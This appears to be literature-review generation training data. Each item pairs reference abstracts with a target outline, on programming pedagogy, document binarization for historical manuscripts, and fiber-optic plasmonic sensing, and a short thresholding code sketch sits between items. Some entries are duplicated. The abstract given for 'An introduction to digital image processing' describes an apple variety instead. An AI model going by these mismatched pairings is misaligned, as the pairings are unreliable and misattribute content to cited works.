--- paper_title: Analysis of Design: An exploration of Patterns and Pattern Languages for Pedagogy paper_content: ion also serves a second purpose, that of cohesion of ideas. Practice can be captured at any scale, but it is the combination of capture and abstraction that makes the presentation of the ideas coherent. Lakoff (Lakoff, 1987) presents an example of this coherent use of abstraction in regard to the Linnean taxonomy of botanical classification Genus, Species, Sub-Species, Variety. An oak tree (for example) can be categorised at any level. However, in folk-classification (as opposed to scientific) Lakoff (quoting studies by Brown and Berlin, p.35) notes that the most commonly used (and by extension, the most significant) name and reference is at the level of abstraction that corresponds to the genus level (“oak”) rather than the life-form (“tree”) or variety (“white oak”) levels. Whilst an interesting observation in it’s own right, the more interesting point is that Linneaus actively used folk criteria for the genus level of abstraction which characterise the most readily apprehended (and used) criteria in “the real world”. This is a concept equally important in OO, Booch’s (Booch, 1994) codification of “key abstractions”, notes that there are levels of categorisation which are more significant in the problem space, and useful to the solution design, than others. He, too, suggests that these might most effectively be identified from actual usage “if the domain expert talks about it, then the abstraction is usually important”. What has been noticed here is that some categories of abstraction are more basic, more meaningful to human beings in their relationship with the world than others; that is the level of abstraction that good patterns seek to embrace. 4.3 Organising Principle As we have seen, patterns do not exist by themselves, but within a framework: a catalogue or language. In a catalogue, the power of the collection resides in the material collected. The index, or finding aid or other system of organisation is of secondary importance, it is simply a mechanism to get to the information. In a dictionary, encyclopaedia or thesaurus, the power resides as much in the arrangement of material, in the power that the organising principle confers to it, as in the individual entries themselves. The solitary definition of a word is useful, but much more potent in the context of a dictionary. The Organising Principle of a Pattern Language has a similar gestalt power; the language captures not only the pieces of design, but the shape of the whole into which the pieces fit. The Alexandrian organising principle is scale. A Pattern Language recognises the impossibility of providing a complete solution (“Here’s the plan for the house/street/city you want to build”) so presents many small, transferable solutions arranged in categories of scale, from “city-relevant” to “house-relevant”. Consequently, if I am building a house, not a whole street, I have an obvious entry point to the most appropriate level of patterns. The boundaries for these categories, however, are not hard and Alexander provides pointers, both up and down, through the levels pointing to larger-scale patterns to which a given pattern is contributory and to smaller-scale patterns on which it rests. The GoF framework is much simpler, residing on the applicability of their solutions to different functionality in the design process (Creational, Structural or Behavioural). 
Reference for this paper: Journal of Computers in Mathematics and Science Teaching: Special Issue CS-ED Research, 18(3):331-348, December 1999. The PPTOT collection has neither order, nor organising principle: instead, four separate “indexes” are provided, each on a different axis: A Learning Objectives Index, a Teaching/Learning Element Index, an Alphabetical Index and an Author Index. It is clear that these indexes have been super-imposed on the collection at a later date, and that they have had no impact at the time of creation. (However, it should be noted that PPOT is a work in progress, and recent work has turned towards structure and taxonomy. Although full details are not available, it would seem that this, too, is based on scale from “a technique pattern aimed at explaining a particular OO concept” to “a complex structure pattern built from smaller fundamental units, such as lectures and exercises” (McLaughlin et al, 1998)). A potentially interesting approach, which has not so far been adopted within the genre is one espoused by Jacobson (one of the original contributors to A Pattern Language) in a later work (Jacobson, Silverstein, Winslow, 1990). In this work the organising principle for good design is the balance achieved on various axes of contrast. Six axes are identified with respect to architecture with “good” design representing an equilibrium along and between these scales. A similar methodological approach (Wildermeersch, 1997) has been taken in an attempt to capture (and improve) the practice and experience of working within project-oriented groups; a domain with more obviously pedagogic potential. 4.4 Value System Design is a purposeful, value-laden activity. Good design encompasses values which are of importance to all the communities (or audience) for which the artefacts are intended. For the purposes of patterns, we can define three audiences: users, other designers and “society”. • Users: Values which are important to users are those embodied in the artefact itself. This is exemplified in the arts-andcrafts motto “Have nothing in your house which you do not know to be useful or believe to be beautiful”. If an object is difficult to use, or ugly, then it fails in its purpose. It is disfunctional. • Other Designers: Whilst fellow professionals might be expected to appreciate the values of the user community, they also hold another set of separate importance. These professional values encompass design notions of “elegance” and “simplicity”. An appreciation of the economy of immaterial processes (such as maintainability, factory production or services) also count here. • Society: Design also addresses ideas of value which are societally constructed. This is a more difficult (and difficult to observe) constituent of patterns and pattern languages. This is because this level is not directly addressed by patterns, although they are created against its backdrop. For example, the Alexandrian pattern 178, describing Composting Toilets, (Alexander et al, 1977) encompasses a far more wide-ranging set of values than a thing designed to do a job efficiently—that is usefully—and/or beautifully. (These values are not necessarily commonly held – but they would have to be, if everyone was to own one. They are of the societal level). Patterns are described and presented as internally consistent system of elements that are good in themselves and in relationship to each other. 
Any further set of values is extrinsic to this ordering, and therefore not described within a pattern collection. This notion of extrinsic validity is analogous to IQ tests which are internally consistent, valid and predictive (as are measurements of height). Their value, however, is neither measured nor contained within the application of the test but is determined by a separate, external system. A society which values high IQ (or tall people) gives a separate – and extrinsic – meaning to the results. The fact that (to continue the example) A Pattern Language doesn’t explicitly incorporate these values doesn’t mean that the patterns weren’t created with reference to them. It may be that there is no need for these values to be expressed in this way. Just as Fine Art reflects the values of the society in which it is created, so may design: “The best paintings often express their culture not just directly but complementarily, because it is by complementing it that they are best designed to serve public needs: the public does not need what it has already got.” (Baxandall, 1972). Alexandrian patterns have three audiences: architects (other designers) and the inhabitants of the buildings (users) are explicitly addressed, society is implicitly addressed. PPTOT patterns have two audiences, teachers (other designers) and the recipients of teaching (users). GoF patterns have but one audience – other designers – and reflect a single system of purely professional values. Christopher Alexander (whilst acknowledging his lack of expertise in the domain of software) has expressed his opinion that software patterns (and, I think by extension patterns based on that system) are not patterns in his sense but “a neat way to capture a bunch of interesting ideas” (Alexander, 1996). He does not explain why he thinks this is the case. It may be the constraint of their single value system. --- paper_title: Transfer in cognition paper_content: The purpose of this paper is to review the cognitive literature regarding transfer in order to provide a context for the consideration of transfer in neural networks. We consider transfer under the three general headings of analogy, skill transfer and metaphor. The emphasis of the research in each of these areas is quite different and the literatures are largely distinct. Important common themes emerge, however, relating to the role of similarity, the importance of “surface content”, and the nature of the representations that are used. We will draw out these common themes, and note ways of facilitating transfer. We also briefly note possible implications for the study of transfer in neural networks. --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. 
This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: On the Cruelty of Really Teaching Computer Science redux paper_content: Is our discipline of computer science in a time of crisis? Our field has helped unlock the human genome, has allowed a hand-held device to be a gateway to the world's information, and has transformed communication and society. Yet students do not want to study computer science. Do enrollment trends portend serious problems requiring immediate solutions or is the crisis greatly exaggerated? --- paper_title: Programming patterns and design patterns in the introductory computer science course paper_content: We look at the essential thinking skills students need to learn in the introductory computer science course based on object-oriented programming. We create a framework for such a course based on the elementary programming and design patterns. Some of these patterns are known in the pattern community, others enrich the collection. Our goal is to help students focus on mastering reasoning and design skills before the language idiosyncrasies muddy the water. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: Problem-Based Learning for Foundation Computer Science Courses paper_content: The foundation courses in computer science pose particular challenges for teacher and learner alike. This paper describes some of these challenges and how we have designed problem-based learning (PBL) courses to address them. We discuss the particular problems we were keen to overcome: the purely technical focus of many courses; the problems of individual learning and the need to establish foundations in a range of areas which are important for computer science graduates. We then outline our course design, showing how we have created problem-based learning courses. The paper reports our evaluation of the approach. This has two parts: assessment of a trial, with a three-year longitudinal follow-up of the students; reports of student learning improvement after we had become experienced in full implementation of PBL. We conclude with a summary of our experience over three years of PBL teaching and discuss some of the pragmatic issues around introducing the radical change in teaching, maintaining staff suppo...
Lebiere, Navigation and Conflict Resolution. N. Kushmerick, C. Lebiere, The Tower of Hanoi and Goal Structures. F.G. Conrad, A.T. Corbett, The LISP Tutor and Skill Acquisition. F.S. Bellezza, C.F. Boyle, The Geometry Tutor and Skill Acquisition. M.K. Singley, The Identical Elements Theory of Transfer. F.G. Conrad, A.T. Corbett, J.M. Fincham, D. Hoffman, Q. Wu, Computer Programming and Transfer. A.T. Corbett, Tutoring of Cognitive Skill. Creating Production-Rule Models. Reflections on the Theory. --- paper_title: A Perspective View and Survey of Meta-Learning paper_content: Different researchers hold different views of what the term meta-learning exactly means. The first part of this paper provides our own perspective view in which the goal is to build self-adaptive learners (i.e. learning algorithms that improve their bias dynamically through experience by accumulating meta-knowledge). The second part provides a survey of meta-learning as reported by the machine-learning literature. We find that, despite different views and research lines, a question remains constant: how can we exploit knowledge about learning (i.e. meta-knowledge) to improve the performance of learning algorithms? Clearly the answer to this question is key to the advancement of the field and continues being the subject of intensive research. ---
Title: Learning and teaching programming: A review and discussion Section 1: INTRODUCTION Description 1: Introduce the importance of programming as a skill, the high demand for programmers, the difficulties encountered by novice programmers, and the scope and focus of the review. Section 2: Experts Versus Novices Description 2: Discuss the distinctions and development stages between novice and expert programmers, characteristics of expert programmers, and typical novice deficits. Section 3: Knowledge Versus Strategies Description 3: Explore the foundational knowledge required for programming and the different strategies used by programmers, including how these differ between novices and experts. Section 4: Procedural Versus Object-Oriented Description 4: Compare issues related to procedural and object-oriented programming paradigms and how they affect novice comprehension and learning. Section 5: NOVICE PROGRAMMERS Description 5: Focus on how novices learn to program, including task complexity, cognitive processes, and the mental models they need to develop. Section 6: Mental Models and Processes Description 6: Detail the various mental models that programmers must maintain, including models of the problem domain, the notional machine, and the program itself. Section 7: Novice Capabilities and Behaviour Description 7: Analyze the specific knowledge and skill deficits of novice programmers, their common misconceptions, and issues with planning and problem-solving. Section 8: Kinds of Novice Description 8: Discuss the diversity among novice programmers, including differences in background, motivation, success predictors, and characteristic behaviors such as "movers" and "stoppers." Section 9: Goals and Progress Description 9: Explore the goals of introductory programming courses, the concept of "deep learning," and the challenge of fostering significant progress among novices. Section 10: Course Design and Teaching Methods Description 10: Review conventional and innovative approaches to course design and teaching methods, with an emphasis on addressing key issues identified in the literature. Section 11: Alternative Methods and Curricula Description 11: Consider alternative curricula and teaching methodologies, such as schema-based instruction, problem-solving approaches, and mathematical foundations. Section 12: Summary and Implications Description 12: Summarize the review and highlight practical implications for teaching programming, including methodological suggestions and potential areas for further research. Section 13: A Programming Framework Description 13: Introduce a programming framework summarizing the relationships between key issues in programming education and its potential uses in course design and student support. Section 14: Comments and Future Work Description 14: Provide speculative observations and suggest topics for future research, including the distinction between effective and ineffective novices and the central role of strategies in learning to program.
A Review of Evaluation of Optimal Binarization Technique for Character Segmentation in Historical Manuscripts
5
--- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry out their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nondestructive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: Selection of thresholding methods for nondestructive testing applications paper_content: In nondestructive testing (NDT) applications based on image analysis, image segmentation is the most important step in the extraction of defective regions of materials. An effective and very simple method of image segmentation, especially in NDT applications, is image thresholding. In an effort to present a quantitative evaluation of image thresholding methods in NDT applications, 41 thresholding algorithms are compared. They are grouped in six categories based on the information they are exploiting, such as histogram shape, object attribute or clustering behavior, etc. Performance assessment is based on the weighted combination of four complementary objective metrics. Based on the results of such NDT images as defective thermal, ultrasonic, eddy current, etc., the thresholding algorithms that perform well over the majority of cases are established and a mixture thresholding scheme is proposed. --- paper_title: An introduction to digital image processing paper_content: A new and distinct spur type apple variety which originated as a limb mutation of the standard winter banana apple tree (non-patented) is provided. This new apple variety possesses a vigorous compact and only slightly spreading growth habit and can be distinguished from its parent and the Housden spur type winter banana apple variety (non-patented). More specifically, the new variety forms more fruiting spurs per unit length on two and three year old wood than the standard winter banana apple tree and less spurs per unit length than the Housden spur type winter banana apple tree. Additionally, the new variety has the ability to heavily bear fruit having a whitish-yellow skin color with a sometimes slight scarlet red blush upon maturity which is substantially identical to that of the standard winter banana apple tree and which has substantially less skin russeting than the Housden spur type winter banana apple tree. --- paper_title: Decompose algorithm for thresholding degraded historical document images paper_content: Numerous techniques have previously been proposed for single-stage thresholding of document images to separate the written or printed information from the background. Although these global or local thresholding techniques have proven effective on particular subclasses of documents, none is able to produce consistently good results on the wide range of document image qualities that exist in general or the image qualities encountered in degraded historical documents.
A new thresholding structure called the decompose algorithm is proposed and compared against some existing single-stage algorithms. The decompose algorithm uses local feature vectors to analyse and find the best approach to threshold a local area. Instead of employing a single thresholding algorithm, automatic selection of an appropriate algorithm for specific types of subregions of the document is performed. The original image is recursively broken down into subregions using quad-tree decomposition until a suitable thresholding method can be applied to each subregion. The algorithm has been trained using 300 historical images obtained from the Library of Congress and evaluated on 300 ‘difficult’ document images, also extracted from the Library of Congress, in which considerable background noise or variation in contrast and illumination exists. Quantitative analysis of the results by measuring text recall, and qualitative assessment of processed document image quality are reported. The decompose algorithm is demonstrated to be effective at resolving the problem in varying quality historical images. --- paper_title: A comparison of binarization methods for historical archive documents paper_content: This paper compares several alternative binarization algorithms for historical archive documents, by evaluating their effect on end-to-end word recognition performance in a complete archive document recognition system utilising a commercial OCR engine. The algorithms evaluated are: global thresholding; Niblack's and Sauvola's algorithms; adaptive versions of Niblack's and Sauvola's algorithms; and Niblack's and Sauvola's algorithms applied to background removed images. We found that, for our archive documents, Niblack's algorithm can achieve better performance than Sauvola's (which has been claimed as an evolution of Niblack's algorithm), and that it also achieved better performance than the internal binarization provided as part of the commercial OCR engine. --- paper_title: Goal-Directed Evaluation of Binarization Methods paper_content: This paper presents a methodology for evaluation of low-level image analysis methods, using binarization (two-level thresholding) as an example. Binarization of scanned gray scale images is the first step in most document image analysis systems. Selection of an appropriate binarization method for an input image domain is a difficult problem. Typically, a human expert evaluates the binarized images according to his/her visual criteria. However, to conduct an objective evaluation, one needs to investigate how well the subsequent image analysis steps will perform on the binarized image. We call this approach goal-directed evaluation, and it can be used to evaluate other low-level image processing methods as well. Our evaluation of binarization methods is in the context of digit recognition, so we define the performance of the character recognition module as the objective measure. Eleven different locally adaptive binarization methods were evaluated, and Niblack's method gave the best performance. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscripts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University in Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques.
The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: An introduction to digital image processing paper_content: A new and distinct spur type apple variety which originated as a limb mutation of the standard winter banana apple tree (non-patented) is provided. This new apple variety possesses a vigorous compact and only slightly spreading growth habit and can be distinguished from its parent and the Housden spur type winter banana apple variety (non-patented). More specifically, the new variety forms more fruiting spurs per unit length on two and three year old wood than the standard winter banana apple tree and less spurs per unit length than the Housden spur type winter banana apple tree. Additionally, the new variety has the ability to heavily bear fruit having a whitish-yellow skin color with a sometimes slight scarlet red blush upon maturity which is substantially identical to that of the standard winter banana apple tree and which has substantially less skin russeting than the Housden spur type winter banana apple tree. --- paper_title: Minimum error thresholding paper_content: Abstract A computationally efficient solution to the problem of minimum error thresholding is derived under the assumption of object and pixel grey level values being normally distributed. The method is applicable in multithreshold selection. --- paper_title: A new method for gray-level picture thresholding using the entropy of the histogram paper_content: Two methods of entropic thresholding proposed by Pun (Signal Process.,2, 1980, 223–237;Comput. Graphics Image Process.16, 1981, 210–239) have been carefully and critically examined. A new method with a sound theoretical foundation is proposed. Examples are given on a number of real and artifically generated histograms. --- paper_title: Histogram concavity analysis as an aid in threshold selection paper_content: A well-known heuristic for segmenting an image into gray level subpopulations is to select thresholds at the bottoms of valleys on the image's histogram. When the subpopulations overlap, valleys may not exist, but it is often still possible to define good thresholds at the `shoulders' of histogram peaks. Both valleys and shoulders correspond to concavities on the histogram, and this suggests that it should be possible to find good candidate thresholds by analyzing the histogram's concavity structure. 
Histogram concavity analysis as an approach to threshold selection is investigated and its performance on a set of histograms of infrared images of tanks is illustrated. --- paper_title: Goal-Directed Evaluation of Binarization Methods paper_content: This paper presents a methodology for evaluation of low-level image analysis methods, using binarization (two-level thresholding) as an example. Binarization of scanned gray scale images is the first step in most document image analysis systems. Selection of an appropriate binarization method for an input image domain is a difficult problem. Typically, a human expert evaluates the binarized images according to his/her visual criteria. However, to conduct an objective evaluation, one needs to investigate how well the subsequent image analysis steps will perform on the binarized image. We call this approach goal-directed evaluation, and it can be used to evaluate other low-level image processing methods as well. Our evaluation of binarization methods is in the context of digit recognition, so we define the performance of the character recognition module as the objective measure. Eleven different locally adaptive binarization methods were evaluated, and Niblack's method gave the best performance. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: A comparison of binarization methods for historical archive documents paper_content: This paper compares several alternative binarization algorithms for historical archive documents, by evaluating their effect on end-to-end word recognition performance in a complete archive document recognition system utilising a commercial OCR engine. The algorithms evaluated are: global thresholding; Niblack's and Sauvola's algorithms; adaptive versions of Niblack's and Sauvola's algorithms; and Niblack's and Sauvola's algorithms applied to background removed images. 
We found that, for our archive documents, Niblack's algorithm can achieve better performance than Sauvola's (which has been claimed as an evolution of Niblack's algorithm), and that it also achieved better performance than the internal binarization provided as part of the commercial OCR engine. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: Selection of thresholding methods for nondestructive testing applications paper_content: In nondestructive testing (NDT) applications based on image analysis, image segmentation is the most important step in the extraction of defective regions of materials. An effective and very simple method of image segmentation, especially in NDT applications, is image thresholding. In an effort to present a quantitative evaluation of image thresholding methods NDT applications, 41 thresholding algorithms are compared. They are grouped in six categories based on the information they are exploiting, such as histogram shape, object attribute or clustering behavior, etc. Performance assessment is based on the weighted combination of four complementary objective metrics. Based on the results of such NDT images as defective thermal, ultrasonic, eddy current, etc., the thresholding algorithms that perform well over the majority of cases are established and a mixture thresholding scheme is proposed. --- paper_title: Optimal combination of document binarization techniques using a self-organizing map neural network paper_content: This paper proposes an integrated system for the binarization of normal and degraded printed documents for the purpose of visualization and recognition of text characters. In degraded documents, where considerable background noise or variation in contrast and illumination exists, there are many pixels that cannot be easily classified as foreground or background pixels. 
For this reason, it is necessary to perform document binarization by combining and taking into account the results of a set of binarization techniques, especially for document pixels that have high vagueness. The proposed binarization technique takes advantage of the benefits of a set of selected binarization algorithms by combining their results using a Kohonen self-organizing map neural network. Specifically, in the first stage the best parameter values for each independent binarization technique are estimated. In the second stage and in order to take advantage of the binarization information given by the independent techniques, the neural network is fed by the binarization results obtained by those techniques using their estimated best parameter values. This procedure is adaptive because the estimation of the best parameter values depends on the content of images. The proposed binarization technique is extensively tested with a variety of degraded document images. Several experimental and comparative results, exhibiting the performance of the proposed technique, are presented. --- paper_title: Minimum error thresholding paper_content: Abstract A computationally efficient solution to the problem of minimum error thresholding is derived under the assumption of object and pixel grey level values being normally distributed. The method is applicable in multithreshold selection. --- paper_title: An evaluation survey of binarization algorithms on historical documents paper_content: Document binarization is an active research area for many years. There are many difficulties associated with satisfactory binarization of document images and especially in cases of degraded historical documents. In this paper, we try to answer the question "how well an existing binarization algorithm can binarize a degraded document image?" We propose a new technique for the validation of document binarization algorithms. Our method is simple in its implementation and can be performed on any binarization algorithm since it doesn't require anything more than the binarization stage. Then we apply the proposed technique to 30 existing binarization algorithms. Experimental results and conclusions are presented. --- paper_title: Histogram concavity analysis as an aid in threshold selection paper_content: A well-known heuristic for segmenting an image into gray level subpopulations is to select thresholds at the bottoms of valleys on the image's histogram. When the subpopulations overlap, valleys may not exist, but it is often still possible to define good thresholds at the 'shoulders' of histogram peaks. Both valleys and shoulders correspond to concavities on the histogram, and this suggests that it should be possible to find good candidate thresholds by analyzing the histogram's concavity structure. Histogram concavity analysis as an approach to threshold selection is investigated and its performance on a set of histograms of infrared images of tanks is illustrated. --- paper_title: A Method for Objective Edge Detection Evaluation and Detector Parameter Selection paper_content: Subjective evaluation by human observers is usually used to analyze and select an edge detector parametric setup when real-world images are considered. We propose a statistical objective performance analysis and detector parameter selection, using detection results produced by different detector parameters.
Using the correspondence between the different detection results, an estimated best edge map, utilized as an estimated ground truth (EGT), is obtained. This is done using both a receiver operating characteristics (ROC) analysis and a Chi-square test, and considers the trade-off between information and noisiness in the detection results. The best edge detector parameter set (PS) is then selected by the same statistical approach, using the EGT. Results are demonstrated for several edge detection techniques, and compared to published subjective evaluation results. The method developed here suggests a general tool to assist in practical implementations of parametric edge detectors where an automatic process is required. --- paper_title: An evaluation survey of binarization algorithms on historical documents paper_content: Document binarization is an active research area for many years. There are many difficulties associated with satisfactory binarization of document images and especially in cases of degraded historical documents. In this paper, we try to answer the question "how well an existing binarization algorithm can binarize a degraded document image?" We propose a new technique for the validation of document binarization algorithms. Our method is simple in its implementation and can be performed on any binarization algorithm since it doesn't require anything more than the binarization stage. Then we apply the proposed technique to 30 existing binarization algorithms. Experimental results and conclusions are presented. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscripts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University in Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. ---
Title: A Review of Evaluation of Optimal Binarization Technique for Character Segmentation in Historical Manuscripts Section 1: INTRODUCTION Description 1: This section should introduce the topic of the paper, provide context about the historical manuscripts in Thailand, and explain the importance and challenges of binarization for character segmentation in such documents. Section 2: BINARIZATION TECHNIQUES Description 2: This section should describe various binarization techniques, including global and local thresholding methods, and their applications in document image processing. Section 3: MEASUREMENTS OF IMAGE QUALITY Description 3: This section should explain different methods and criteria used to evaluate the quality of binarized images, such as misclassification error, edge mismatch, and shape distortion penalty. Section 4: A FRAMEWORK OF AN AUTOMATIC SELECTION OF OPTIMAL BINARIZATION ALGORITHM Description 4: This section should present a proposed framework for automatically selecting the best binarization algorithm for historical documents, incorporating steps like algorithm selection, image clustering, feature extraction, and machine learning classification. Section 5: CONCLUSION AND DISCUSSION Description 5: This section should summarize the findings of the survey, discuss the limitations of existing binarization techniques, and propose future research directions to improve the automatic selection of binarization algorithms for historical manuscripts.
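To make the local adaptive thresholding methods that recur in the references above (Niblack, Sauvola) and the misclassification-error style of evaluation mentioned in Section 3 of the outline more concrete, here is a minimal Python sketch. It is not the implementation of any cited paper; the window size and the k and R constants are common illustrative defaults.

```python
import numpy as np
from scipy.ndimage import uniform_filter

def local_stats(img, win=25):
    """Local mean and standard deviation over a win x win window."""
    img = img.astype(np.float64)
    mean = uniform_filter(img, win)
    sq_mean = uniform_filter(img ** 2, win)
    std = np.sqrt(np.maximum(sq_mean - mean ** 2, 0.0))
    return mean, std

def niblack(img, win=25, k=-0.2):
    """Niblack threshold T = m + k*s (k is typically negative for dark text)."""
    m, s = local_stats(img, win)
    return img > (m + k * s)          # True = background, False = ink

def sauvola(img, win=25, k=0.5, R=128.0):
    """Sauvola threshold T = m * (1 + k*(s/R - 1)), R = dynamic range of the std."""
    m, s = local_stats(img, win)
    return img > (m * (1.0 + k * (s / R - 1.0)))

def misclassification_error(binary, ground_truth):
    """Fraction of pixels assigned to the wrong class (0 = perfect)."""
    return np.mean(binary.astype(bool) != ground_truth.astype(bool))
```

Goal-directed evaluation, as in the OCR-based studies cited above, would replace misclassification_error with the downstream character-recognition accuracy obtained on the binarized image.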
Plasmonic Optical Fiber-Grating Immunosensing: A Review
17
--- paper_title: Fiber optic SPR biosensing of DNA hybridization and DNA-protein interactions. paper_content: In this paper we present a fiber optic surface plasmon resonance (SPR) sensor as a reusable, cost-effective and label free biosensor for measuring DNA hybridization and DNA-protein interactions. This is the first paper that combines the concept of a fiber-based SPR system with DNA aptamer bioreceptors. The fibers were sputtered with a 50nm gold layer which was then covered with a protein repulsive self-assembled monolayer of mixed polyethylene glycol (PEG). Streptavidin was attached to the PEG's carboxyl groups to serve as a versatile binding element for biotinylated ssDNA. The ssDNA coated SPR fibers were first evaluated as a nucleic acid biosensor through a DNA-DNA hybridization assay for a random 37-mer ssDNA. This single stranded DNA showed a 15 nucleotides overlap with the receptor ssDNA on the SPR fiber. A linear calibration curve was observed in 0.5-5 microM range. A negative control test did not reveal any significant non-specific binding, and the biosensor was easily regenerated. In a second assay the fiber optic SPR biosensor was functionalized with ssDNA aptamers against human immunoglobulin E. Limits of detection (2nM) and quantification (6nM) in the low nanomolar range were observed. The presented biosensor was not only useful for DNA and protein quantification purposes, but also to reveal the binding kinetics occurring at the sensor surface. The dissociation constant between aptamer and hIgE was equal to 30.9+/-2.9nM. The observed kinetics fully comply with most data from the literature and were also confirmed by own control measurements. --- paper_title: Fibre-optic evanescent field absorption sensor based on a U-shaped probe paper_content: A fibre-optic evanescent field absorption sensor based on a U-shaped sensing probe is described. The influences of fibre core diameter, bending radius of the probe and the refractive index of the fluid on the sensitivity of the sensor are evaluated experimentally. The results are compared with the theoretical results obtained using geometrical optics and based on two-dimensional treatment. A good qualitative agreement is found between them. --- paper_title: Surface Plasmon Resonance-Based Fiber Optic Sensors: Principle, Probe Designs, and Some Applications paper_content: Surface plasmon resonance technique in collaboration with optical fiber technology has brought tremendous advancements in sensing of various physical, chemical, and biochemical parameters. In this review article, we present the principle of SPR technique for sensing and various designs of the fiber optic SPR probe reported for the enhancement of the sensitivity of the sensor. In addition, we present few examples of the surface plasmon resonance- (SPR-) based fiber optic sensors. The present review may provide researchers valuable information regarding fiber optic SPR sensors and encourage them to take this area for further research and development. --- paper_title: Local Excitation, Scattering, and Interference of Surface Plasmons paper_content: The optical probe of a scanning near-field optical microscope is shown to act as a point source of surface plasmon (SP) polaritons on gold and silver films. Plasmon excitation manifests itself by emission of light in the direction of the SP resonance angle, originating from an area with the shape of a dipole radiation pattern whose extension is given by the SP decay length. 
